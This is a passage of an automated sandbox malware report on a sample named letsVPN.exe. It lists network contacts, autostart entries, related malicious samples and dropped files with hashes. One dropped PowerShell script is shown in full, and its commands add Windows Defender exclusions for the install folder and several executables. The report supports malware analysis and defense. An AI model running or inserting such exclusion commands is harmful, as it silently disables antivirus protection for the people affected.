                                                                                                                                                                      		high
                                                                                                                                                                      https://nit.crash1ytics.comhttpCode=-2LetsPRO.exe, 0000003D.00000002.3424803867.000000000EEAE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Validateehttp://schemas.xmlsoap.org/ws/2005/02/trusletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://icsharpcode.net/sharpdevelop/syntaxdefinition/20081Errorletsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://defaultcontainer/LetsPRO;component/Themes/RadioButtonDictionary.xamldLetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/ValidateTletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://foo/app.xamldLetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Validateletsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high

                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                              Public IPs

                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                              18.136.85.30
                                                                                                                                                                              		socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.comUnited States
                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                              183.60.146.66
                                                                                                                                                                              		unknownChina
                                                                                                                                                                              		134763CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCNfalse
                                                                                                                                                                              35.227.223.56
                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                                              103.235.46.96
                                                                                                                                                                              		www.wshifen.comHong Kong
                                                                                                                                                                              		55967BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdfalse
                                                                                                                                                                              23.98.101.155
                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                              8.223.59.119
                                                                                                                                                                              		unknownSingapore
                                                                                                                                                                              		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                                                                              8.217.212.245
                                                                                                                                                                              		unknownSingapore
                                                                                                                                                                              		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                                                                              8.223.56.120
                                                                                                                                                                              		unknownSingapore
                                                                                                                                                                              		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                                                                              77.88.55.88
                                                                                                                                                                              		yandex.comRussian Federation
                                                                                                                                                                              		13238YANDEXRUfalse
                                                                                                                                                                              13.227.9.24
                                                                                                                                                                              		d1dmgcawtbm6l9.cloudfront.netUnited States
                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                              172.217.21.36
                                                                                                                                                                              		www.google.comUnited States
                                                                                                                                                                              		15169GOOGLEUSfalse

                                                                                                                                                                              Private

                                                                                                                                                                              IP
                                                                                                                                                                              127.0.0.1

                                                                                                                                                                              General Information

                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                              Analysis ID:1582024
                                                                                                                                                                              Start date and time:2024-12-29 16:13:26 +01:00
                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                              Overall analysis duration:0h 13m 16s
                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                              Report type:full
                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                              Number of analysed new started processes analysed:76
                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                              Technologies:
                                                                                                                                                                              • HCA enabled
                                                                                                                                                                              • EGA enabled
                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                              Sample name:letsVPN.exe
                                                                                                                                                                              Detection:MAL
                                                                                                                                                                              Classification:mal60.spre.troj.spyw.evad.winEXE@103/291@9/12
                                                                                                                                                                              EGA Information:
                                                                                                                                                                              • Successful, ratio: 83.3%
                                                                                                                                                                              HCA Information:
                                                                                                                                                                              • Successful, ratio: 51%
                                                                                                                                                                              • Number of executed functions: 23
                                                                                                                                                                              • Number of non-executed functions: 406
                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                              Warnings

                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 23.218.208.109, 2.16.158.91, 2.16.158.171, 2.16.158.97, 2.16.158.96, 2.16.158.179, 2.16.158.184, 2.16.158.185, 2.16.158.170, 2.16.158.169, 4.153.25.230, 142.250.181.78, 13.107.246.63, 52.149.20.212
                                                                                                                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, in2-gw2-05-3d6c3051.eastus2.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, in-prod-pme-eastus2-ingestion-66ddb56a.trafficmanager.net, ocsp.digicert.com, www.bing.com.edgekey.net, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, www.google-analytics.com
                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 7632 because it is empty
                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                                                              Simulations

                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                              10:14:20API Interceptor1x Sleep call for process: letsVPN.exe modified
                                                                                                                                                                              10:14:21API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                              10:15:01API Interceptor15x Sleep call for process: powershell.exe modified
                                                                                                                                                                              10:15:23API Interceptor15872x Sleep call for process: LetsPRO.exe modified
                                                                                                                                                                              16:15:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LetsPRO "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent
                                                                                                                                                                              16:15:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LetsPRO "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent

                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                              IPs

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              183.60.146.66SBSLMD5qhm.msiGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        KLL_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            KLL_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                lets-test.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  103.235.46.96VIP-#U4f1a#U5458#U7248.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                                                  • www.baidu.com/
                                                                                                                                                                                                  DNF#U604b#U62180224a.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • www.baidu.com/s?wd=www.cfjuzi.com&rsv_spt=1&issp=1&rsv_bp=0&ie=utf-8&tn=utf8speed_dg&inputT=453
                                                                                                                                                                                                  New Al Maktoum International Airport Enquiry Ref #2401249.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                  • www.wvufcw948o.top/pt46/?ara=runx2q514acjuuceA0OTyKdTIzcy0YcAOvUMICEfyLgC3vUfTcW2aWKxfLyo5+IB4FDn&D8V=_FNDAz
                                                                                                                                                                                                  4.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                                                  • www.baidu.com/
                                                                                                                                                                                                  2.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                                                  • www.baidu.com/
                                                                                                                                                                                                  1.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                                                  • www.baidu.com/
                                                                                                                                                                                                  3.exeGet hashmaliciousBlackMoon, XRedBrowse
                                                                                                                                                                                                  • www.baidu.com/
                                                                                                                                                                                                  1.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                                                  • www.baidu.com/
                                                                                                                                                                                                  f1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • www.baidu.com/
                                                                                                                                                                                                  SecuriteInfo.com.FileRepMalware.29184.31872.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • www.baidu.com/

                                                                                                                                                                                                  Domains

                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                  www.wshifen.comInstruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  2024-12-10#U67e5#U9605_uninst.exeGet hashmaliciousValleyRATBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  2024-12-10#U67e5#U9605_uninst.exeGet hashmaliciousValleyRATBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  b6FArHy7yA.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  VIP-#U4f1a#U5458#U7248.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                                                  • 103.235.46.96
                                                                                                                                                                                                  360safe.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  XiaobingOnekey.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 103.235.46.96
                                                                                                                                                                                                  DNF#U604b#U62180224a.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 103.235.46.96
                                                                                                                                                                                                  http://profdentalcare.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 103.235.46.96
                                                                                                                                                                                                  nal.fqoqehwib.comSBSLMD5qhm.msiGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                                  • 99.34.124.121
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 5.217.108.181
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 99.34.124.121
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 99.34.124.121
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 5.217.108.181
                                                                                                                                                                                                  KLL_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 104.112.172.245
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 5.217.108.181
                                                                                                                                                                                                  KLL_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 10.176.38.125
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 104.112.172.245
                                                                                                                                                                                                  lets-test.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 104.112.172.245
                                                                                                                                                                                                  d1dmgcawtbm6l9.cloudfront.netSBSLMD5qhm.msiGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                                  • 108.138.24.227
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.239.15.26
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.239.15.216
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 108.138.187.72
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.239.15.44
                                                                                                                                                                                                  KLL_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 108.138.24.182
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 108.138.24.227
                                                                                                                                                                                                  KLL_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 108.138.24.115
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 108.138.24.115
                                                                                                                                                                                                  lets-test.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 3.164.160.102

                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                  CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCNsplsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 14.17.77.142
                                                                                                                                                                                                  xobftuootu.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 183.61.188.99
                                                                                                                                                                                                  sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                  • 211.99.125.149
                                                                                                                                                                                                  owari.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 211.102.80.218
                                                                                                                                                                                                  jklarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 183.6.228.171
                                                                                                                                                                                                  j2qv9oE81X.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 59.38.96.207
                                                                                                                                                                                                  db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                  • 14.17.91.101
                                                                                                                                                                                                  05KN0c1P2J.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 14.17.91.116
                                                                                                                                                                                                  SBSLMD5qhm.msiGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                                  • 183.60.146.66
                                                                                                                                                                                                  SecuriteInfo.com.Win32.MalwareX-gen.12431.9721.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 183.61.168.1
                                                                                                                                                                                                  AMAZON-02USAqua.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                  mips64.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                  bot.x86_64.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                                                                                                                                  • 34.249.145.219
                                                                                                                                                                                                  m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                  armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 34.254.182.186
                                                                                                                                                                                                  i586.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                  bot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                  • 54.247.62.1
                                                                                                                                                                                                  T1#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 34.241.209.94
                                                                                                                                                                                                  main_mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 34.249.145.219
                                                                                                                                                                                                  Aqua.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                  BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtddb0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                  • 106.13.224.246
                                                                                                                                                                                                  arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                  • 119.75.215.154
                                                                                                                                                                                                  nsharm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 182.61.224.140
                                                                                                                                                                                                  3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 182.61.224.138
                                                                                                                                                                                                  Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  elitebotnet.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                  • 180.76.189.193
                                                                                                                                                                                                  2024-12-10#U67e5#U9605_uninst.exeGet hashmaliciousValleyRATBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  2024-12-10#U67e5#U9605_uninst.exeGet hashmaliciousValleyRATBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  hax.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 182.61.224.158
                                                                                                                                                                                                  Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 180.76.229.255
                                                                                                                                                                                                  MICROSOFT-CORP-MSN-AS-BLOCKUSsparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                  • 204.79.197.219
                                                                                                                                                                                                  db0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                  • 40.108.137.192

                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                  No context

                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                  No context

                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):318
                                                                                                                                                                                                  Entropy (8bit):4.740682303463164
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:IPeGgdEYC5BeGgdEEFmJovkBPeGgdEEFrGvkBPeGgdEEFwn0ZkBPeGgdEEFQr4MF:ISuFAuEcJxSuEJGQSuEyPSuESr1SuE6
                                                                                                                                                                                                  MD5:B34636A4E04DE02D079BA7325E7565F0
                                                                                                                                                                                                  SHA1:F32C1211EAC22409BB195415CB5A8063431F75CD
                                                                                                                                                                                                  SHA-256:A9901397D39C0FC74ADFDB95DD5F95C3A14DEF3F9D58EF44AB45FC74A56D46DF
                                                                                                                                                                                                  SHA-512:6EB3255E3C89E2894F0085095FB5F6AB97349F0ED63C267820C82916F43A0AC014A94F98C186FF5D54806469A00C3C700A34D26DE90AFB090B80AC824A05AA2F
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:Add-MpPreference -ExclusionPath "C:\Program Files (x86)\letsvpn"..Add-MpPreference -ExclusionProcess "LetsPRO.exe"..Add-MpPreference -ExclusionProcess "tapinstall.exe"..Add-MpPreference -ExclusionProcess "uninst.exe"..Add-MpPreference -ExclusionProcess "Update.exe"..Add-MpPreference -ExclusionProcess "ndp462-web.exe"

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\LetsPRO.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):247840
                                                                                                                                                                                                  Entropy (8bit):6.8984241672651985
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:jZzvhs2Z4n1E7g34XtVYAOfTd/z44JsQw4UsrV:jJ+2Z4nShVY5JUCUu
                                                                                                                                                                                                  MD5:3530CB1B45FF13BA4456E4FFBCAE6379
                                                                                                                                                                                                  SHA1:5BE7B8E19418212A5A93E900C12830FACFD6BA54
                                                                                                                                                                                                  SHA-256:E0669B6312BAAEF6A3C86F3142B333EAB48494511405398BB09CC464881A43C9
                                                                                                                                                                                                  SHA-512:23BAAE23815FC946203BE6D93CEF84FF23FDE8ED88017179C65B7DE1F3B6114BC8343C277B8AE5A1D85AA59F25B5F146C1D827B7E4617BFD0AA0FF20359F49B5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e..O.S.O.S.O.S.).R.O.S.).R.O.S.).R.O.S.'.R.O.S.'.R.O.S.'.R.O.S.).R.O.S.O.S.O.S5&.R.O.S5&.S.O.S.O.S.O.S5&.R.O.SRich.O.S........................PE..L.....p_............................+.............@..................................V....@.....................................<.......X............... ........!......p...............................@...............,............................text...8........................... ..`.rdata..V...........................@..@.data....#..........................@....rsrc...X...........................@..@.reloc...!......."...x..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\Update.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1911328
                                                                                                                                                                                                  Entropy (8bit):5.911432104400453
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:IWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2T:Vt3UCiag6CKM2zCyZuOjJaxSS5qhr
                                                                                                                                                                                                  MD5:FE1E856A9B3491135C7D0FFF820F7025
                                                                                                                                                                                                  SHA1:3DAEBB0C6DCE636D9E4309568AE1882CB30D4A7C
                                                                                                                                                                                                  SHA-256:ED1CF65B74438AD7AFACE47E0A613228C1E5C44C29B556D18AC797FBE7F2D7B7
                                                                                                                                                                                                  SHA-512:8D43C859414394945443224CCEB39241DD287786903290D3F774306734CACA44E8E50CC8258764DFF3C194BA95EBA2A35A230427CA26AF04A882356868D32996
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\letsvpn\Update.exe, Author: Joe Security
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.p_............................>.... ........@.. .......................`......T.....@.....................................W.... .................. ....@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H.......LU..............,.................................................{....*..{....*..{....*r.(......}......}......}....*....0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o....*.*..0..K....... .A. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X*..0...........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*....{....*..{....*

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\.check_result

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                  Entropy (8bit):4.040775468486825
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Gkg2day58L:GL2db8L
                                                                                                                                                                                                  MD5:862D9ED729F9BD1209A13C49C8388CFC
                                                                                                                                                                                                  SHA1:18C5C6FAAEC66D790893DD34D6A415879E36E92C
                                                                                                                                                                                                  SHA-256:A21ED21B8C02AD37840FB4374873858F650A7EBE9C29789D2562B51F30C2922B
                                                                                                                                                                                                  SHA-512:33C78DE82C4B449B59BEBA7BC7F700F5A9E271007B7D79A95C99F994CC15C151FD25471DD8682BEB06C55D4BB282E7890282947C8CD16419311E911900005FE5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:LetsPRO.exe Started Successfully.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\CommunityToolkit.Mvvm.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):113696
                                                                                                                                                                                                  Entropy (8bit):6.322809804830913
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:HARI0MvSAA6U7ks4jhOWE8i6wrNMRjYAZlfNASZfSOi3d3qKbE/mf:HWMpA6Agg8ahQYAZlFnUdXE/w
                                                                                                                                                                                                  MD5:C5485166B86B4CD6DE97C4DC8D0FBEFB
                                                                                                                                                                                                  SHA1:C047F339399098E7E4BF92EF7A8F38C1E5D5054D
                                                                                                                                                                                                  SHA-256:21678620BF5E7B4C8481270594B0A36615BE6152CA7A9396487364712236A3D5
                                                                                                                                                                                                  SHA-512:33EFDA5903587D17A698BFAEC6E5C119D4ADCFC23EA1588F2B155FFCBA88761E40E1DB791F545A064EFFDC63E6BA7AA68027C96B4A632331C0EA7297AC093F26
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
